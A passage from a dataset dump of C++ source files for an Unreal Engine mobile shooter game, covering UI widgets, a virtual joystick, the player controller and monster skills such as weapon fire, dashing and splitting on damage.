Text_Ammo);\n\tPG_WIDGET_DECLAR(UOverlay, OverlayLightBox);\n\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 WeaponIndex = PG_INVALID_INDEX;\n\n\tUPROPERTY(BlueprintReadWrite)\n\tint32 SlotIndex = PG_INVALID_INDEX;\n\nprivate :\n\tUPROPERTY()\n\tTWeakObjectPtr<class APG_GameModeBase>\tm_pGameMode;\n};\n" }, { "alpha_fraction": 0.7915006875991821, "alphanum_fraction": 0.7981407642364502, "avg_line_length": 31.06382942199707, "blob_id": "ce81c39fed3654a98b1d990b7cf69b771367725f", "content_id": "ba773d8ca3fa7cad7e76fd7ff3ecc0cc0b91f4d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1508, "license_type": "no_license", "max_line_length": 141, "num_lines": 47, "path": "/Source/Project_Gun/Private/UI/PG_VirtualJoystick.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "#include \"UI/PG_VirtualJoystick.h\"\n#include \"Player/PlayerController/PG_PlayerController.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n\nvoid SPG_VirtualJoystick::Construct(const FArguments& InArgs)\n{\n\tState = State_Inactive;\n\tbVisible = true;\n\tbPreventReCenter = false;\n\n\t// just set some defaults\n\tActiveOpacity = 1.0f;\n\tInactiveOpacity = 0.1f; \n\tTimeUntilDeactive = 0.5f;\n\tTimeUntilReset = 2.0f;\n\tActivationDelay = 0.f;\n\tCurrentOpacity = InactiveOpacity;\n\tStartupDelay = 0.f; \n\n\t// listen for displaymetrics changes to reposition controls\n\tFSlateApplication::Get().GetPlatformApplication()->OnDisplayMetricsChanged().AddSP(this, &SPG_VirtualJoystick::HandleDisplayMetricsChanged);\n}\n\nFReply SPG_VirtualJoystick::OnTouchStarted(const FGeometry& MyGeometry, const FPointerEvent& Event)\n{\n\treturn SVirtualJoystick::OnTouchStarted(MyGeometry, Event);\n}\n\nFReply SPG_VirtualJoystick::OnTouchMoved(const FGeometry& MyGeometry, const FPointerEvent& Event)\n{\n\treturn SVirtualJoystick::OnTouchMoved(MyGeometry, Event);\n}\n\nFReply SPG_VirtualJoystick::OnTouchEnded(const FGeometry& MyGeometry, const FPointerEvent& Event)\n{\n\tauto pMyPlayerState = MyPlayerController->GetPlayerState<APG_MyPlayerState>();\n\tif (pMyPlayerState)\n\t\tpMyPlayerState->TryUseTheSkill();\n\n\treturn SVirtualJoystick::OnTouchEnded(MyGeometry, Event);\n}\n\nvoid SPG_VirtualJoystick::BindPlayerController(class APG_PlayerController* NewPlayerController)\n{\n\tABCHECK(nullptr != NewPlayerController);\n\tMyPlayerController = NewPlayerController;\n}" }, { "alpha_fraction": 0.7845394611358643, "alphanum_fraction": 0.7861841917037964, "avg_line_length": 
26.0222225189209, "blob_id": "9ac3a10872b76ddfcf95b31ecb2fbdab6e11aaf5", "content_id": "6e356d2111731b957b8c1a6280c79f44625c4b4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 181, "num_lines": 45, "path": "/Source/Project_Gun/Public/BlueScriptObject/Target/PG_TargetSpot.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/Actor.h>\n#include \"PG_TargetSpot.generated.h\"\n\n\nUCLASS()\nclass PROJECT_GUN_API APG_TargetSpot : public AActor\n{\n\tGENERATED_BODY()\n\t\npublic:\t\n\t// Sets default values for this actor's properties\n\tAPG_TargetSpot();\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\npublic:\t\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnGateOpen();\n\tUFUNCTION(BlueprintImplementableEvent)\n\tvoid OnGateClose();\n\npublic :\n\tUPROPERTY(VisibleAnywhere, Category = \"PG TriggerBox\")\n\tUBoxComponent* Trigger;\n\n\tUPROPERTY(VisibleAnywhere, Category = \"PG TriggerBox\")\n\tUStaticMeshComponent* Box;\n\n\tUPROPERTY(EditAnywhere, BlueprintReadWrite, Category = \"PG TriggerBox\")\n\tUParticleSystemComponent*\tPortalEffect;\n\t\nprivate :\n\tUFUNCTION()\n\tvoid OnPlayerOverlap(UPrimitiveComponent* OverlappedComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, int32 OtherBodyIndex, bool bFromSweep, const FHitResult& SweepResult);\n};\n" }, { "alpha_fraction": 0.5955581665039062, "alphanum_fraction": 0.5955581665039062, "avg_line_length": 27.516666412353516, "blob_id": "be1fa3342accb8d1589fea3319c4eede25f9c9f5", "content_id": "f7cde4ea15ef29e5c718a9e11a159de0e2bf165c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1917, "license_type": "no_license", "max_line_length": 83, "num_lines": 60, "path": "/Source/Project_Gun/Public/Player/PlayerController/PG_PlayerController.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n\n#include <GameFramework/PlayerController.h>\n#include \"PG_PlayerController.generated.h\"\n\n\n/**\n * PlayerController : 플레이어의 행동 관련하여 처리하도록 한다.\n * 클라이언트 느낌\n-. 키입력을 받아 처리\n-. UI 처리에 하기에 좋다\n-. 
틱마다 검사하는 일을 구현하기 좋다\n */\nUCLASS()\nclass PROJECT_GUN_API APG_PlayerController : public APlayerController\n{\n\tGENERATED_BODY()\n\t\npublic:\n\tAPG_PlayerController();\n\n\tvirtual void CreateTouchInterface() override;\t\t// 조이스틱의 터치 이벤트를 컨트롤하기 위한 override\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void OnPossess(APawn* aPawn) override;\n\nprotected:\n\tvirtual void BeginPlay() override;\n\tvirtual void SetupInputComponent() override;\n\npublic :\n\t//==========================================================\n\t// Player Input 처리\n\t//==========================================================\n\tUFUNCTION(BlueprintCallable, Category = \"PG TouchInterface\")\n\tvoid SetLockJoystickInput(bool a_bLock);\n\n\t//==========================================================\n\t// Player 행동 처리\n\t//==========================================================\n\tvoid OnFire();\t\t\t// 무기 발사\n\tvoid OnStateClear();\t// 스테이지 클리어 성공\n\tvoid OnStateFailed();\t// 스테이지 클리어 실패\n\nprotected:\n\t//==========================================================\n\t// UI\n\t//==========================================================\n\t//UPROPERTY()\n\t//class UPG_UserWidgetPlayStage* UserWidgetPlayStage;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenPlayStage* m_pUserWidgetScreenPlayStage;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenStageClear* m_pWidgetStageClear;\n\tUPROPERTY()\n\tclass UPG_UserWidgetScreenStageFailed* m_pUserWidgetScreenStageFailed;\n};\n" }, { "alpha_fraction": 0.730659008026123, "alphanum_fraction": 0.730659008026123, "avg_line_length": 15.619047164916992, "blob_id": "c14c8faabb3ce33ac1b1e322b91b698aece14c72", "content_id": "4883eb063185ce955aa357e25b970bd524829072", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 351, "license_type": "no_license", "max_line_length": 79, "num_lines": 21, "path": "/Source/Project_Gun/Public/BlueScriptObject/Weapon/PG_WeaponGrenadeLauncher.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include \"PG_WeaponGrenadeLauncher.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API APG_WeaponGrenadeLauncher : public APG_Weapon\n{\n\tGENERATED_BODY()\n\t\n\t\n\t\n\t\n};\n" }, { "alpha_fraction": 0.7670235633850098, "alphanum_fraction": 0.7734475135803223, "avg_line_length": 27.487804412841797, "blob_id": "bd31dd682975a0e9732e9a67568d5d49521cbd77", "content_id": "1da7f1a61c094230a9f82d77dd89fbec4b0c24cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2345, "license_type": "no_license", "max_line_length": 120, "num_lines": 82, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetPlayStageWeaponBag.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n\n#include \"UI/PG_UserWidgetPlayStageWeaponBag.h\"\n#include \"UI/PG_UserWidgetWeaponBox.h\"\n#include \"Player/PlayerState/PG_MyPlayerState.h\"\n#include \"Game/GameMode/PG_GameModeBase.h\"\n\nvoid UPG_UserWidgetPlayStageWeaponBag::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\n\tPG_WIDGET_LINK_TArray(UPG_UserWidgetWeaponBox, WB_WeaponSlot, eMaxWeaponSlot);\n\n\tfor (auto WeaponSlot : m_pkWB_WeaponSlot)\n\t{\n\t\tif 
(WeaponSlot)\n\t\t\tWeaponSlot->OnBtnWeaponClicked_SlotIndex.AddUObject(this, &UPG_UserWidgetPlayStageWeaponBag::OnBtnWeaponSlotClicked);\n\t}\n}\n\nbool UPG_UserWidgetPlayStageWeaponBag::SetSlotWaponIndex(int32 nSlotIndex, int32 nWeaponIndex)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num(), false);\n\tABCHECK(nullptr != m_pkWB_WeaponSlot[nSlotIndex], false);\n\n\tauto pGameModeBase = Cast<APG_GameModeBase>(GetWorld()->GetAuthGameMode());\n\tABCHECK(nullptr != pGameModeBase, false);\n\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetSlotIndex(nSlotIndex);\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetWeaponIndex(pGameModeBase, nWeaponIndex);\n\n\treturn true;\n}\n\nbool UPG_UserWidgetPlayStageWeaponBag::SetSlotWeaponAmmo(int32 nSlotIndex, int32 nAmmo)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num(), false);\n\tABCHECK(nullptr != m_pkWB_WeaponSlot[nSlotIndex], false);\n\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetAmmo(nAmmo);\n\n\treturn true;\n}\n\nbool UPG_UserWidgetPlayStageWeaponBag::SetEnableSlot(int32 nSlotIndex, bool bEnable)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num(), false);\n\tABCHECK(nullptr != m_pkWB_WeaponSlot[nSlotIndex], false);\n\n\tm_pkWB_WeaponSlot[nSlotIndex]->SetEnable(bEnable);\n\n\treturn true;\n}\n\nvoid UPG_UserWidgetPlayStageWeaponBag::SetEnableLightBox(int32 nSlotIndex)\n{\n\tint nIndex = 0;\n\tfor (auto WeaponSlot : m_pkWB_WeaponSlot)\n\t{\n\t\tif (WeaponSlot)\n\t\t{\n\t\t\tbool bEnable = (nIndex == nSlotIndex);\n\t\t\tWeaponSlot->SetEnableLightBox(bEnable);\n\t\t}\n\n\t\tnIndex++;\n\t}\n}\n\nvoid UPG_UserWidgetPlayStageWeaponBag::OnBtnWeaponSlotClicked(int32 nSlotIndex)\n{\n\tABCHECK(nSlotIndex < m_pkWB_WeaponSlot.Num());\n\n\tauto pMyPlayerState = Cast<APG_MyPlayerState>(GetWorld()->GetFirstPlayerController()->PlayerState);\n\tABCHECK(nullptr != pMyPlayerState);\n\n\t// 무기 변경\n\tABCHECK(pMyPlayerState->ChangeWeapon(nSlotIndex, m_pkWB_WeaponSlot[nSlotIndex]->GetWeaponIndex()));\n\n\tSetEnableLightBox(nSlotIndex);\n}" }, { "alpha_fraction": 0.772695779800415, "alphanum_fraction": 0.772695779800415, "avg_line_length": 24.76785659790039, "blob_id": "c5f48eb262cb4b7202969f561827deb17834d6f3", "content_id": "561359aed86c35592b75aec77cd8292b19416829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1489, "license_type": "no_license", "max_line_length": 94, "num_lines": 56, "path": "/Source/Project_Gun/Public/Character/PG_Char.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Character/PG_CharDefine.h\"\n\n#include <GameFramework/Character.h>\n#include \"PG_Char.generated.h\"\n\nUCLASS()\nclass PROJECT_GUN_API APG_Char : public ACharacter\n{\n\tGENERATED_BODY()\n\npublic:\n\t// Sets default values for this character's properties\n\tAPG_Char();\n\nprotected:\n\t// Called when the game starts or when spawned\n\tvirtual void BeginPlay() override;\n\tvirtual void PostInitializeComponents() override;\n\tvirtual void Destroyed() override;\n\t// 액터가 월드 밖으로 나갔을 때 Call (Kill Z)\n\tvirtual void FellOutOfWorld(const class UDamageType & dmgType) override;\n\npublic:\t\n\t// Called every frame\n\tvirtual void Tick(float DeltaTime) override;\n\n\t// Called to bind functionality to input\n\tvirtual void SetupPlayerInputComponent(class UInputComponent* PlayerInputComponent) override;\n\n\tbool AssetLoadCharacter(FString AssetPath);\n\n\t// 발사 
처리\n\tUFUNCTION()\n\tvirtual void Fire();\n\n\t\nprotected :\n\tUFUNCTION()\n\tvirtual void OnAssetLoadCharacterCompleted();\n\nprotected :\n\tTSharedPtr<struct FStreamableHandle> AssetStreamingHandle;\n\t\nprotected:\n\tUPROPERTY(VisibleAnywhere, Category = \"PG UI\", Meta = (AllowPrivateAccess = true))\n\tclass UWidgetComponent* HPBarWidget = nullptr;\t\t// Debug HPBar\n\n\t// 캐릭터 그림자\n\tUPROPERTY(VisibleAnywhere, Category = \"PG CharacterShadowInfo\")\n\tclass UStaticMeshComponent* CharacterShadowComponent;\n};\n" }, { "alpha_fraction": 0.7660398483276367, "alphanum_fraction": 0.7714601755142212, "avg_line_length": 28.258899688720703, "blob_id": "fcf666f07a1009d9d36df8cb1147a8dde98e3b70", "content_id": "287d4c0d648f91547f1dd28f609f8d4f317fd9f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9392, "license_type": "no_license", "max_line_length": 194, "num_lines": 309, "path": "/Source/Project_Gun/Private/Character/PG_MonCharSkillType.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharSkillType.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/PG_MyChar.h\"\n#include \"Character/Component/PG_ComponentWeapon.h\"\n#include \"Character/Component/PG_ComponentDash.h\"\n#include \"Character/Component/PG_ComponentDivisionSpawn.h\"\n#include \"AI/PG_AICon_Mon.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n\n#include <Engine/BlockingVolume.h>\n#include <DrawDebugHelpers.h>\n\nAPG_MonCharSkillType::APG_MonCharSkillType()\n{\n\tPrimaryActorTick.bCanEverTick = true;\n\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n\n\tWeaponComponent = CreateDefaultSubobject<UPG_ComponentWeapon>(TEXT(\"PROJECTILEFIRECOMPONENT\"));\n\tDashComponent = CreateDefaultSubobject<UPG_ComponentDash>(TEXT(\"DASHCOMPONENT\"));\n\tPreviewMeshComponent = CreateDefaultSubobject<UStaticMeshComponent>(TEXT(\"PREVIEWMESHCOMPONENT\"));\n\tPreviewMeshComponent->SetupAttachment(GetMesh());\n\tPreviewMeshComponent->SetVisibility(false);\n\tDivisionSpawnComponent = CreateDefaultSubobject<UPG_ComponentDivisionSpawn>(TEXT(\"COMPONENTDIVISIONSPAWN\"));\n}\n\nvoid APG_MonCharSkillType::Tick(float DeltaTime)\n{\n\tSuper::Tick(DeltaTime);\n\n\tif (m_bEquipWeapon)\n\t\tUpdateWeaponSystem();\n\n\tif (m_bEquipDash)\n\t\tUpdateDashSystem();\n}\n\nvoid APG_MonCharSkillType::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tif (WeaponComponent)\n\t{\n\t\tm_bEquipWeapon = WeaponComponent->IsEquipWeapon();\n\t\tif (m_bEquipWeapon)\n\t\t{\n\t\t\t// 스테이지 시작시 플레이어가 몬스터 사정권에 있으면 바로 총알이 날아가버리므로,\n\t\t\t// 난이도 밸런스를 위해 시작시 스킬 쿨타임을 바로 적용한다.\n\t\t\tm_bCanWeaponFire = false;\n\t\t\tGetWorldTimerManager().SetTimer(HandleWeaponCoolTime, this, &APG_MonCharSkillType::OnEndWeaponFireCoolTime, MonsterSkillTypeData.MWeaponCoolTime, false, MonsterSkillTypeData.MWeaponCoolTime);\n\t\t}\n\t}\n\n\tif (DashComponent)\n\t{\n\t\tm_bEquipDash = (MonsterSkillTypeData.MDashCoolTime > 0 && MonsterSkillTypeData.MDashMoveDistance > 0 && MonsterSkillTypeData.MDashSpeed > 0);\n\t\tif (m_bEquipDash)\n\t\t{\n\t\t\tDashComponent->OnDashEnd.AddUObject(this, &APG_MonCharSkillType::OnEndDash);\n\t\t\t// 스테이지 시작시 플레이어가 몬스터 사정권에 있으면 바로 몬스터가 대시하므로,\n\t\t\t// 난이도 밸런스를 위해 시작시 스킬 쿨타임을 바로 적용한다.\n\t\t\tm_bCanDash = false;\n\t\t\tGetWorldTimerManager().SetTimer(HandleDashCoolTime, this, &APG_MonCharSkillType::OnEndDashCoolTime, MonsterSkillTypeData.MDashCoolTime, false, 
MonsterSkillTypeData.MDashCoolTime);\n\t\t}\n\t}\n}\n\nvoid APG_MonCharSkillType::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterSkillTypeData.MRemainDivisionCount = MonsterSkillTypeData.MDivisionCount;\n\tMonsterData = &MonsterSkillTypeData;\n}\n\nvoid APG_MonCharSkillType::Destroyed()\n{\n\tGetWorldTimerManager().ClearTimer(HandleWeaponCoolTime);\n\tGetWorldTimerManager().ClearTimer(HandleDashDelayTime);\n\tGetWorldTimerManager().ClearTimer(HandleDashTime);\n\tGetWorldTimerManager().ClearTimer(HandleDashCoolTime);\n\n\tif (WeaponComponent)\n\t\tWeaponComponent->OnDestroy();\n\n\tSuper::Destroyed();\n}\n\nvoid APG_MonCharSkillType::OnHitCallback(UPrimitiveComponent* HitComp, AActor* OtherActor, UPrimitiveComponent* OtherComp, FVector NormalImpulse, const FHitResult& Hit)\n{\n\tauto pBlockingVolume = Cast<ABlockingVolume>(OtherActor);\n\tauto pMonChar = Cast<APG_MonChar>(OtherActor);\n\tif (pBlockingVolume || pMonChar)\n\t{\n\t\tm_bOnHitBlocking = true;\n\t\t//FString DebugMsg(TEXT(\"Call\"));\n\t\t//GEngine->AddOnScreenDebugMessage(-1, .1f, FColor::Yellow, DebugMsg);\n\t}\n}\n\nvoid APG_MonCharSkillType::UpdateWeaponSystem()\n{\n\tif (nullptr == WeaponComponent)\n\t\treturn;\n\n\tif (m_bCanWeaponFire)\n\t{\n\t\tif (FindTargetToMyCharForWeapon())\n\t\t{\n\t\t\tm_bCanWeaponFire = false;\n\t\t\tABCHECK(0 < MonsterSkillTypeData.MWeaponCoolTime);\n\t\t\t\t\t\t\n\t\t\tFireWeapon();\n\n\t\t\tGetWorldTimerManager().SetTimer(HandleWeaponCoolTime, this, &APG_MonCharSkillType::OnEndWeaponFireCoolTime, MonsterSkillTypeData.MWeaponCoolTime, false, MonsterSkillTypeData.MWeaponCoolTime);\n\t\t}\n\t}\n\telse\n\t{\n\t\tif (WeaponComponent->IsEquipWeapon())\n\t\t\tWeaponComponent->StopFire();\n\t}\n}\n\nvoid APG_MonCharSkillType::UpdateDashSystem()\n{\n\tif (nullptr == DashComponent)\n\t\treturn;\n\n\tif (m_bCanDash)\n\t{\n\t\tFVector vTarget;\n\t\tif (FindTargetToMyCharForDash(vTarget))\n\t\t{\n\t\t\tm_bCanDash = false;\n\t\t\tDash(vTarget);\n\t\t}\n\t}\n\n\t// 장애물에 부딪히면 대쉬를 멈추게 한다.\n\tif (DashComponent->IsDash() && m_bOnHitBlocking)\n\t{\n\t\tDashComponent->StopDash();\n\t\t//FString DebugMsg(TEXT(\"Stop Dash\"));\n\t\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n\t}\n}\n\nvoid APG_MonCharSkillType::FireWeapon()\n{\n\tABCHECK(nullptr != WeaponComponent);\n\tWeaponComponent->Fire();\n}\n\nvoid APG_MonCharSkillType::Dash(FVector vTarget)\n{\n\tABCHECK(nullptr != DashComponent);\n\n\tif (false == DashComponent->IsDash())\n\t{\n\t\t// 몬스터 AI 이동을 정지시키고 대쉬 이동 방향을 vTarget으로 설정한 후\n\t\t// MonsterSkillTypeData.MDashReadyTime 만큼 대기하였다가 대쉬한다.\n\t\tif (DashComponent->SetupDashData(vTarget, MonsterSkillTypeData.MDashMoveDistance, MonsterSkillTypeData.MDashSpeed))\n\t\t{\n\t\t\tm_bDoNotRotation = true;\n\n\t\t\tStopAI();\n\n\t\t\tPreviewMeshComponent->SetVisibility(true);\n\t\t\tPreviewMeshComponent->SetRelativeScale3D(FVector(1.0f, GetDashDistaceScale(), 1.0f));\n\t\t\tGetWorldTimerManager().SetTimer(HandleDashDelayTime, this, &APG_MonCharSkillType::OnStartDash, MonsterSkillTypeData.MDashReadyTime, false, MonsterSkillTypeData.MDashReadyTime);\n\t\t}\n\t}\n}\n\nfloat APG_MonCharSkillType::GetDashDistaceScale()\n{\n\tABCHECK(nullptr != PreviewMeshComponent->GetStaticMesh(), 0.0f);\n\n\t// MDashMoveDistance : 1000\n\tFBoxSphereBounds MeshBounds = PreviewMeshComponent->GetStaticMesh()->GetBounds();\n\n\tfloat fReturn = (MonsterSkillTypeData.MDashMoveDistance / MeshBounds.BoxExtent.X) / 2;\n\treturn fReturn;\n}\n\nvoid 
APG_MonCharSkillType::SetMonsterDataDivision(FPGMonsterData_SkillType& MonsterData_SkillType)\n{\n\tMonsterSkillTypeData = MonsterData_SkillType;\n}\n\nbool APG_MonCharSkillType::IsPossibleToDivision()\n{\n\tif (0 >= MonsterSkillTypeData.MRemainDivisionCount || 0 >= MonsterSkillTypeData.MDivisionCount)\n\t\treturn false;\n\n\t// 분열 대역\n\tfloat fPossibleToDivions_HPRatio = (1.0f / (MonsterSkillTypeData.MDivisionCount + 1)) * MonsterSkillTypeData.MRemainDivisionCount;\n\treturn (GetHPRatio() < fPossibleToDivions_HPRatio);\n}\n\nint32 APG_MonCharSkillType::GetDivisionCountToHPRatio()\n{\n\tif (MonsterSkillTypeData.MRemainDivisionCount <= 0 || 0.0f >= GetHPRatio())\n\t\treturn 0;\n\n\tfloat fActiveHPRatio = 1.0f / (MonsterSkillTypeData.MDivisionCount + 1);\n\treturn (int32)(GetHPRatio() / fActiveHPRatio);\n}\n\nbool APG_MonCharSkillType::FindTargetToMyCharForWeapon()\n{\n\tauto AMyChar = GetWorld()->GetFirstPlayerController()->GetCharacter();\n\tif (AMyChar)\n\t{\n\t\tfloat fDistance = FMath::Abs<float>(FVector::Distance(AMyChar->GetActorLocation(), GetActorLocation()));\n\t\tif (fDistance <= WeaponComponent->GetAttackRange())\n\t\t\treturn true;\n\t}\n\n\treturn false;\n}\n\nbool APG_MonCharSkillType::FindTargetToMyCharForDash(FVector& vGetTargetPos)\n{\n\tauto AMyChar = GetWorld()->GetFirstPlayerController()->GetCharacter();\n\tif (AMyChar)\n\t{\n\t\tfloat fDistance = FMath::Abs<float>(FVector::Distance(AMyChar->GetActorLocation(), GetActorLocation()));\n\t\tif (fDistance <= MonsterSkillTypeData.MDetectRange)\n\t\t{\n\t\t\tvGetTargetPos = AMyChar->GetActorLocation();\n\t\t\treturn true;\n\t\t}\n\t}\n\n\treturn false;\n}\n\nbool APG_MonCharSkillType::OnDamage(int32 nDamage, bool IsUseLetharAttack)\n{\n\tbool bIsDie = Super::OnDamage(nDamage, IsUseLetharAttack);\n\tif (false == bIsDie && IsPossibleToDivision())\n\t{\n\t\tif (0 < MonsterSkillTypeData.MRemainDivisionCount)\n\t\t{\n\t\t\tFVector vRange(MonsterSkillTypeData.MDivisionSpawnRange, MonsterSkillTypeData.MDivisionSpawnRange, 0.0f);\n\t\t\tif (DivisionSpawnComponent)\n\t\t\t\tDivisionSpawnComponent->DivisionSpawnActor<APG_MonCharSkillType>(MonsterSkillTypeData.MDivisionAmount, vRange);\n\t\t}\n\n\t\tMonsterSkillTypeData.MRemainDivisionCount = GetDivisionCountToHPRatio();\n\t}\n\n\treturn bIsDie;\n}\n\nvoid APG_MonCharSkillType::OnEndWeaponFireCoolTime()\n{\n\tm_bCanWeaponFire = true;\n}\n\nvoid APG_MonCharSkillType::OnStartDash()\n{\n\tABCHECK(nullptr != DashComponent);\n\t\n\tm_bOnHitBlocking = false;\n\n\tDashComponent->StartDash();\n\tPreviewMeshComponent->SetVisibility(false);\n\n\t// 임시코드\n\t//GetWorldTimerManager().SetTimer(HandleDashTime, this, &APG_MonCharSkillType::OnEndDash, 1.0f, false, 1.0f);\n}\n\nvoid APG_MonCharSkillType::OnEndDash()\n{\n\tABCHECK(nullptr != DashComponent);\n\n\tif (DashComponent->IsDash())\n\t\tDashComponent->StopDash();\n\n\tm_bDoNotRotation = false;\n\n\tRunAI();\n\n\tGetWorldTimerManager().SetTimer(HandleDashCoolTime, this, &APG_MonCharSkillType::OnEndDashCoolTime, MonsterSkillTypeData.MDashCoolTime, false, MonsterSkillTypeData.MDashCoolTime);\n\n\t//FString DebugMsg(TEXT(\"Dash End\"));\n\t//GEngine->AddOnScreenDebugMessage(-1, 1.0f, FColor::Yellow, DebugMsg);\n}\n\nvoid APG_MonCharSkillType::OnEndDashCoolTime()\n{\n\tm_bCanDash = true;\n}\n\nvoid APG_MonCharSkillType::OnSpawnActor(APG_MonCharSkillType* ASpawnActor)\n{\n\tABCHECK(nullptr != ASpawnActor);\n\n\tFPGMonsterData_SkillType MakeMonsterData_SkillType = MonsterSkillTypeData;\n\tMakeMonsterData_SkillType.MRemainDivisionCount = 
GetDivisionCountToHPRatio();\n\n\tASpawnActor->SetMonsterDataDivision(MakeMonsterData_SkillType);\n\tASpawnActor->SetHP(MakeMonsterData_SkillType.MHP);\n}" }, { "alpha_fraction": 0.7956318259239197, "alphanum_fraction": 0.7956318259239197, "avg_line_length": 25.70833396911621, "blob_id": "a00b82dd940790aa3c09a5a9f052346f2f4f7b5c", "content_id": "720da4af98a8da7e0bb034cf3332f1d859e61d58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 643, "license_type": "no_license", "max_line_length": 79, "num_lines": 24, "path": "/Source/Project_Gun/Private/Character/PG_MonCharDivisionSkillType.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/PG_MonCharDivisionSkillType.h\"\n#include \"Character/PG_MonChar.h\"\n#include \"Character/Component/PG_ComponentDivisionSpawn.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n#include \"AI/PG_AICon_Mon.h\"\n\nAPG_MonCharDivisionSkillType::APG_MonCharDivisionSkillType()\n{\n\tAIControllerClass = APG_AICon_Mon::StaticClass();\n}\n\nvoid APG_MonCharDivisionSkillType::BeginPlay()\n{\n\tSuper::BeginPlay();\n}\n\nvoid APG_MonCharDivisionSkillType::PostInitializeComponents()\n{\n\tSuper::PostInitializeComponents();\n\n\tMonsterData = &MonsterDivisionSkillTypeData;\n}\n" }, { "alpha_fraction": 0.7971014380455017, "alphanum_fraction": 0.7971014380455017, "avg_line_length": 38.03947448730469, "blob_id": "1a09240fc68e83dfdca27bf57725723a8dc6d2be", "content_id": "27fbac38df16c6b843c57feb286ba8a782a5da15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2969, "license_type": "no_license", "max_line_length": 159, "num_lines": 76, "path": "/Source/Project_Gun/Private/UI/PG_UserWidgetStageFailed.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"UI/PG_UserWidgetStageFailed.h\"\n#include \"Game/GameMode/PG_GameModeStage.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n#include <Components/Overlay.h>\n\nvoid UPG_UserWidgetStageFailed::NativeConstruct()\n{\n\tSuper::NativeConstruct();\n\tOverlay_ActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveFlag\")));\n\tABCHECK(nullptr != Overlay_ActiveFlag);\n\tOverlay_DeActiveFlag = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveFlag\")));\n\tABCHECK(nullptr != Overlay_DeActiveFlag);\n\tOverlay_ActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveTime\")));\n\tABCHECK(nullptr != Overlay_ActiveTime);\n\tOverlay_DeActiveTime = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveTime\")));\n\tABCHECK(nullptr != Overlay_DeActiveTime);\n\tOverlay_ActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_ActiveLethal\")));\n\tABCHECK(nullptr != Overlay_ActiveLethal);\n\tOverlay_DeActiveLethal = Cast<UOverlay>(GetWidgetFromName(TEXT(\"Overlay_DeActiveLethal\")));\n\tABCHECK(nullptr != Overlay_DeActiveLethal);\n}\n\nbool 